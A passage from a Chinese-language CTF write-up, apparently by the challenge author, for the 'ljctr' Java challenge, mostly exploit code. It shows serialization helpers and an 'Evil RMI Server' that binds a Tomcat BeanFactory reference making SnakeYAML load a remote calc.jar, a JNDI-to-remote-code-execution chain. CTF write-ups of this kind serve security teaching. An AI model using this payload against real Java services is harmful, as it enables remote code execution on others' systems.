class="literal">null</span>;&#125;</span><br><span class="line">        <span class="keyword">public</span> PooledConnection <span class="title function_">getPooledConnection</span> <span class="params">( String user, String password )</span> <span class="keyword">throws</span> SQLException &#123;<span class="keyword">return</span> <span class="literal">null</span>;&#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] serialize(<span class="keyword">final</span> Object obj) <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">btout</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">objOut</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(btout);</span><br><span class="line">        objOut.writeObject(obj);</span><br><span class="line">        <span class="keyword">return</span> btout.toByteArray();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">deserialize</span><span class="params">(<span class="keyword">final</span> <span class="type">byte</span>[] serialized)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">ByteArrayInputStream</span> <span class="variable">btin</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>(serialized);</span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">objIn</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(btin);</span><br><span class="line">        <span class="keyword">return</span> objIn.readObject();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">writeFile</span><span class="params">(String filePath, <span class="type">byte</span>[] content)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">FileOutputStream</span> <span class="variable">outputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(filePath);</span><br><span class="line">        outputStream.write( content );</span><br><span class="line">        outputStream.close();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] FiletoBytes(String filename) <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">buf</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">        <span class="type">File</span> <span class="variable">file</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">File</span>(filename);</span><br><span class="line">        <span class="type">FileInputStream</span> <span class="variable">fis</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">        fis = <span class="keyword">new</span> <span class="title class_">FileInputStream</span>(file);</span><br><span class="line">        <span class="type">int</span> <span class="variable">size</span> <span class="operator">=</span> fis.available();</span><br><span class="line">        <span class="type">byte</span>[] bytes = <span class="keyword">new</span> <span class="title class_">byte</span>[size];</span><br><span class="line">        fis.read(bytes);</span><br><span class="line">       <span class="keyword">return</span> bytes;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="yaml-load-poc"><a href="#yaml-load-poc" class="headerlink" title="yaml load poc"></a><strong>yaml</strong> load poc</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span><span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;[*]Evil RMI Server is Listening on port: 6666&quot;</span>);</span><br><span class="line">        <span class="type">Registry</span> <span class="variable">registry</span> <span class="operator">=</span> LocateRegistry.createRegistry( <span class="number">6666</span>);</span><br><span class="line">        <span class="type">ResourceRef</span> <span class="variable">ref</span> <span class="operator">=</span> tomcat_snakeyaml();</span><br><span class="line">        <span class="type">ReferenceWrapper</span> <span class="variable">referenceWrapper</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ReferenceWrapper</span>(ref);</span><br><span class="line">        registry.bind(<span class="string">&quot;calc&quot;</span>, referenceWrapper);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">* new org.yaml.snakeyaml.Yaml().load(String)</span></span><br><span class="line"><span class="comment">* 满足存在Yaml</span></span><br><span class="line"><span class="comment">* yaml加载执行</span></span><br><span class="line"><span class="comment">* <span class="doctag">@return</span></span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> ResourceRef <span class="title function_">tomcat_snakeyaml</span><span class="params">()</span>&#123;</span><br><span class="line">        <span class="type">ResourceRef</span> <span class="variable">ref</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ResourceRef</span>(<span class="string">&quot;org.yaml.snakeyaml.Yaml&quot;</span>, <span class="literal">null</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;&quot;</span>,</span><br><span class="line">                <span class="literal">true</span>, <span class="string">&quot;org.apache.naming.factory.BeanFactory&quot;</span>, <span class="literal">null</span>);</span><br><span class="line">        <span class="type">String</span> <span class="variable">yaml</span> <span class="operator">=</span> <span class="string">&quot;!!javax.script.ScriptEngineManager [\n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;  !!java.net.URLClassLoader [[\n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;    !!java.net.URL [\&quot;http://127.0.0.1:8888/calc.jar\&quot;]\n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;  ]]\n&quot;</span> +</span><br><span class="line">                <span class="string">&quot;]&quot;</span>;</span><br><span class="line">        ref.add(<span class="keyword">new</span> <span class="title class_">StringRefAddr</span>(<span class="string">&quot;forceString&quot;</span>, <span class="string">&quot;a=load&quot;</span>));</span><br><span class="line">        ref.add(<span class="keyword">new</span> <span class="title class_">StringRefAddr</span>(<span class="string">&quot;a&quot;</span>, yaml));</span><br><span class="line">        <span class="keyword">return</span> ref;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>calc.jar怎么制作 github有现成的。</p>
<h2 id="0x04-总结"><a href="#0x04-总结" class="headerlink" title="0x04 总结"></a>0x04 总结</h2><p>这道ljctr的题就完成了，正如题目名字一样ljctr的出题。其实怎么说呢，自己感觉还不错，至少可以让做题的人学到一些东西灵活处理java中的问题。并且可能在真实环境中存在也是我出题的初衷了。wp一直没有时间写拖了这么久抱歉。<a target="_blank" rel="noopener" href="https://github.com/Firebasky/ctf-Challenge/blob/main/2022_dest0g3_ljctr/c3p0_jndi_agnet.jar">c3p0_jndi_agnet.jar</a></p>
<p>题目复现可以在buuctf中寻找。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://erroratao.github.io/">项目</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E9%A2%98%E4%B8%BA%E8%AF%9D"><span class="toc-number">1.</span> <span class="toc-text">0x00 题为话</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E9%A2%98%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%E4%BB%8B%E7%BB%8D"><span class="toc-number">2.</span> <span class="toc-text">0x01 题环境搭建介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E5%88%86%E6%9E%90%E9%A2%98%E7%9B%AE"><span class="toc-number">3.</span> <span class="toc-text">0x02 分析题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-poc"><span class="toc-number">4.</span> <span class="toc-text">0x03 poc</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#jndi-poc"><span class="toc-number">4.1.</span> <span class="toc-text">jndi poc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#yaml-load-poc"><span class="toc-number">4.2.</span> <span class="toc-text">yaml load poc</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E6%80%BB%E7%BB%93"><span class="toc-number">5.</span> <span class="toc-text">0x04 总结</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/06/04/ljctr-wp/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/06/04/ljctr-wp/&text=ljctr wp"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/06/04/ljctr-wp/&title=ljctr wp"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/06/04/ljctr-wp/&is_video=false&description=ljctr wp"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ljctr wp&body=Check out this article: http://example.com/2022/06/04/ljctr-wp/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/06/04/ljctr-wp/&title=ljctr wp"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/06/04/ljctr-wp/&title=ljctr wp"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/06/04/ljctr-wp/&title=ljctr wp"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/06/04/ljctr-wp/&title=ljctr wp"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/06/04/ljctr-wp/&name=ljctr wp&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/06/04/ljctr-wp/&t=ljctr wp"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    Firebasky
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://erroratao.github.io/">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
